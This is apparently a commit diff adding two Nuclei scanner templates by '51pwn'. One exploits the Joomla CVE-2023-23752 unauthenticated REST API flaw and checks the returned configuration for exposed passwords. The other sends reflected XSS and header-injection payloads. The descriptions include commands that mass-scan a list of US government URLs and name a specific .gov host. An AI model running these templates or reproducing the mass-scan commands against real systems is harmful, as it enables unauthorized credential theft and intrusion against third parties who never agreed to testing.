GhostTroops
diff --git a/‎config/51pwn/CVE-2023-23752.yaml
Lines changed: 301 additions & 0 deletions b/‎config/51pwn/CVE-2023-23752.yaml
Lines changed: 301 additions & 0 deletions
diff --git a/‎config/51pwn/XSS_test.yaml
Lines changed: 65 additions & 0 deletions b/‎config/51pwn/XSS_test.yaml
Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,301 @@
+id: CVE-2023-23752
+
+info:
+  name: CVE-2023-23752
+  author: 51pwn
+  severity: critical
+  description: |
+    Joomla webservice endpoint access
+    由于公司对漏洞的要求比较高，代码审计很快集中到了请求路由的代码块。不管是Wordpress/RounderCube还是PhpMyAdmin以及一些知名度比较高的php应用（一个Java安全研究员感到头皮发麻），我的重点对象变成了请求路由的代码追踪，一旦分析经过路由选择之后，剩下的业务代码我是完全不看了。虽然有点不专业，但是这是挖掘未授权漏洞最好的道路，最终终于找到了一个不错的高危漏洞——Joomla未授权访问Rest API。
+     Joomla大致有三个路由入口，分别是
+
+    根目录的index.php(用户访问文章)
+    根目录的administrator/index.php(管理员管理)
+    根目录的api/index.php(开发者爱好的Rest API)
+    未授权的接口正是第三个入口。因此影响的只有Joomla4.0.0——Joomla4.2.7（Rest API 4.x正式开发）
+
+    受影响的版本
+    Joomla! CMS 版本 4.0.0-4.2.7
+    
+    cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|sort -u|nuclei -duc -t $PWD/config/51pwn/CVE-2023-23752.yaml -json -o us_gov_nuclei_CVE-2023-23752.json
+    v1/banners
+    v1/banners/:id
+    v1/banners
+    v1/banners/:id
+    v1/banners/:id
+    v1/banners/clients
+    v1/banners/clients/:id
+    v1/banners/clients
+    v1/banners/clients/:id
+    v1/banners/clients/:id
+    v1/banners/categories
+    v1/banners/categories/:id
+    v1/banners/categories
+    v1/banners/categories/:id
+    v1/banners/categories/:id
+    v1/banners/:id/contenthistory
+    v1/banners/:id/contenthistory/keep
+    v1/banners/:id/contenthistory
+    v1/config/application
+    v1/config/application
+    v1/config/:component_name
+    v1/config/:component_name
+    v1/contacts/form/:id
+    v1/contacts
+    v1/contacts/:id
+    v1/contacts
+    v1/contacts/:id
+    v1/contacts/:id
+    v1/contacts/categories
+    v1/contacts/categories/:id
+    v1/contacts/categories
+    v1/contacts/categories/:id
+    v1/contacts/categories/:id
+    v1/fields/contacts/contact
+    v1/fields/contacts/contact/:id
+    v1/fields/contacts/contact
+    v1/fields/contacts/contact/:id
+    v1/fields/contacts/contact/:id
+    v1/fields/contacts/mail
+    v1/fields/contacts/mail/:id
+    v1/fields/contacts/mail
+    v1/fields/contacts/mail/:id
+    v1/fields/contacts/mail/:id
+    v1/fields/contacts/categories
+    v1/fields/contacts/categories/:id
+    v1/fields/contacts/categories
+    v1/fields/contacts/categories/:id
+    v1/fields/contacts/categories/:id
+    v1/fields/groups/contacts/contact
+    v1/fields/groups/contacts/contact/:id
+    v1/fields/groups/contacts/contact
+    v1/fields/groups/contacts/contact/:id
+    v1/fields/groups/contacts/contact/:id
+    v1/fields/groups/contacts/mail
+    v1/fields/groups/contacts/mail/:id
+    v1/fields/groups/contacts/mail
+    v1/fields/groups/contacts/mail/:id
+    v1/fields/groups/contacts/mail/:id
+    v1/fields/groups/contacts/categories
+    v1/fields/groups/contacts/categories/:id
+    v1/fields/groups/contacts/categories
+    v1/fields/groups/contacts/categories/:id
+    v1/fields/groups/contacts/categories/:id
+    v1/contacts/:id/contenthistory
+    v1/contacts/:id/contenthistory/keep
+    v1/contacts/:id/contenthistory
+    v1/content/articles
+    v1/content/articles/:id
+    v1/content/articles
+    v1/content/articles/:id
+    v1/content/articles/:id
+    v1/content/categories
+    v1/content/categories/:id
+    v1/content/categories
+    v1/content/categories/:id
+    v1/content/categories/:id
+    v1/fields/content/articles
+    v1/fields/content/articles/:id
+    v1/fields/content/articles
+    v1/fields/content/articles/:id
+    v1/fields/content/articles/:id
+    v1/fields/content/categories
+    v1/fields/content/categories/:id
+    v1/fields/content/categories
+    v1/fields/content/categories/:id
+    v1/fields/content/categories/:id
+    v1/fields/groups/content/articles
+    v1/fields/groups/content/articles/:id
+    v1/fields/groups/content/articles
+    v1/fields/groups/content/articles/:id
+    v1/fields/groups/content/articles/:id
+    v1/fields/groups/content/categories
+    v1/fields/groups/content/categories/:id
+    v1/fields/groups/content/categories
+    v1/fields/groups/content/categories/:id
+    v1/fields/groups/content/categories/:id
+    v1/content/articles/:id/contenthistory
+    v1/content/articles/:id/contenthistory/keep
+    v1/content/articles/:id/contenthistory
+    v1/extensions
+    v1/languages/content
+    v1/languages/content/:id
+    v1/languages/content
+    v1/languages/content/:id
+    v1/languages/content/:id
+    v1/languages/overrides/search
+    v1/languages/overrides/search/cache/refresh
+    v1/languages/overrides/site/zh-CN
+    v1/languages/overrides/site/zh-CN/:id
+    v1/languages/overrides/site/zh-CN
+    v1/languages/overrides/site/zh-CN/:id
+    v1/languages/overrides/site/zh-CN/:id
+    v1/languages/overrides/administrator/zh-CN
+    v1/languages/overrides/administrator/zh-CN/:id
+    v1/languages/overrides/administrator/zh-CN
+    v1/languages/overrides/administrator/zh-CN/:id
+    v1/languages/overrides/administrator/zh-CN/:id
+    v1/languages/overrides/site/en-GB
+    v1/languages/overrides/site/en-GB/:id
+    v1/languages/overrides/site/en-GB
+    v1/languages/overrides/site/en-GB/:id
+    v1/languages/overrides/site/en-GB/:id
+    v1/languages/overrides/administrator/en-GB
+    v1/languages/overrides/administrator/en-GB/:id
+    v1/languages/overrides/administrator/en-GB
+    v1/languages/overrides/administrator/en-GB/:id
+    v1/languages/overrides/administrator/en-GB/:id
+    v1/languages
+    v1/languages
+    v1/media/adapters
+    v1/media/adapters/:id
+    v1/media/files
+    v1/media/files/:path/
+    v1/media/files/:path
+    v1/media/files
+    v1/media/files/:path
+    v1/media/files/:path
+    v1/menus/site
+    v1/menus/site/:id
+    v1/menus/site
+    v1/menus/site/:id
+    v1/menus/site/:id
+    v1/menus/administrator
+    v1/menus/administrator/:id
+    v1/menus/administrator
+    v1/menus/administrator/:id
+    v1/menus/administrator/:id
+    v1/menus/site/items
+    v1/menus/site/items/:id
+    v1/menus/site/items
+    v1/menus/site/items/:id
+    v1/menus/site/items/:id
+    v1/menus/administrator/items
+    v1/menus/administrator/items/:id
+    v1/menus/administrator/items
+    v1/menus/administrator/items/:id
+    v1/menus/administrator/items/:id
+    v1/menus/site/items/types
+    v1/menus/administrator/items/types
+    v1/messages
+    v1/messages/:id
+    v1/messages
+    v1/messages/:id
+    v1/messages/:id
+    v1/modules/types/site
+    v1/modules/types/administrator
+    v1/modules/site
+    v1/modules/site/:id
+    v1/modules/site
+    v1/modules/site/:id
+    v1/modules/site/:id
+    v1/modules/administrator
+    v1/modules/administrator/:id
+    v1/modules/administrator
+    v1/modules/administrator/:id
+    v1/modules/administrator/:id
+    v1/newsfeeds/feeds
+    v1/newsfeeds/feeds/:id
+    v1/newsfeeds/feeds
+    v1/newsfeeds/feeds/:id
+    v1/newsfeeds/feeds/:id
+    v1/newsfeeds/categories
+    v1/newsfeeds/categories/:id
+    v1/newsfeeds/categories
+    v1/newsfeeds/categories/:id
+    v1/newsfeeds/categories/:id
+    v1/plugins
+    v1/plugins/:id
+    v1/plugins/:id
+    v1/privacy/requests
+    v1/privacy/requests/:id
+    v1/privacy/requests/export/:id
+    v1/privacy/requests
+    v1/privacy/consents
+    v1/privacy/consents/:id
+    v1/privacy/consents/:id
+    v1/redirects
+    v1/redirects/:id
+    v1/redirects
+    v1/redirects/:id
+    v1/redirects/:id
+    v1/tags
+    v1/tags/:id
+    v1/tags
+    v1/tags/:id
+    v1/tags/:id
+    v1/templates/styles/site
+    v1/templates/styles/site/:id
+    v1/templates/styles/site
+    v1/templates/styles/site/:id
+    v1/templates/styles/site/:id
+    v1/templates/styles/administrator
+    v1/templates/styles/administrator/:id
+    v1/templates/styles/administrator
+    v1/templates/styles/administrator/:id
+    v1/templates/styles/administrator/:id
+    v1/users
+    v1/users/:id
+    v1/users
+    v1/users/:id
+    v1/users/:id
+    v1/fields/users
+    v1/fields/users/:id
+    v1/fields/users
+    v1/fields/users/:id
+    v1/fields/users/:id
+    v1/fields/groups/users
+    v1/fields/groups/users/:id
+    v1/fields/groups/users
+    v1/fields/groups/users/:id
+    v1/fields/groups/users/:id
+    v1/users/groups
+    v1/users/groups/:id
+    v1/users/groups
+    v1/users/groups/:id
+    v1/users/groups/:id
+    v1/users/levels
+    v1/users/levels/:id
+    v1/users/levels
+    v1/users/levels/:id
+    v1/users/levels/:id
+  reference:
+    - https://hackerone.com/reports/358112
+    - https://51pwn.com
+  tags: web,cve,2023
+
+requests:
+  - raw:
+      - |+
+        GET /api/index.php/v1/config/application?public=true HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        Pragma:no-cache
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        Connection: close
+    unsafe: true
+    pipeline: true
+    # pipeline-concurrent-connections: 40
+    # pipeline-requests-per-connection: 25000
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    stop-at-first-match: true
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "links"
+          - '"password":'
+          # user|pass|id
+
+      - type: word
+        part: body
+        words:
+          - "attributes"
@@ -0,0 +1,65 @@
+id: XSS_test
+
+info:
+  name: CVE-XSS_test-23752
+  author: 51pwn
+  severity: critical
+  description: |
+    XSS_test
+    nuclei -duc -t $PWD/config/51pwn/XSS_test.yaml -u https://calendar.fan.gov -debug
+    cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|nuclei -duc -t $PWD/config/51pwn/XSS_test.yaml -v
+  reference:
+    - https://portswigger.net/research/web-cache-entanglement
+    - https://51pwn.com
+  tags: web,cve,2023
+
+requests:
+  - raw:
+      - |+
+        GET //?"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Cookie: language='-alert(1)-';
+        X-Forwarded-Host:'-alert(1)-'
+        origin: '-alert(1)-'
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+
+
+      - |+
+        GET /%2F?"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Cookie: language='-alert(1)-';
+        X-Forwarded-Host:'-alert(1)-'
+        origin: '-alert(1)-'
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+
+
+
+      - |+
+        GET /(A("><script>alert(1)</script>))/ HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Cookie: language='-alert(1)-';
+        X-Forwarded-Host:'-alert(1)-'
+        origin: '-alert(1)-'
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+
+
+    unsafe: true
+    # pipeline-concurrent-connections: 40
+    # pipeline-requests-per-connection: 25000
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    stop-at-first-match: true
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "<script>alert(1)</script>"
+          - "'-alert(1)-'"
+        condition: or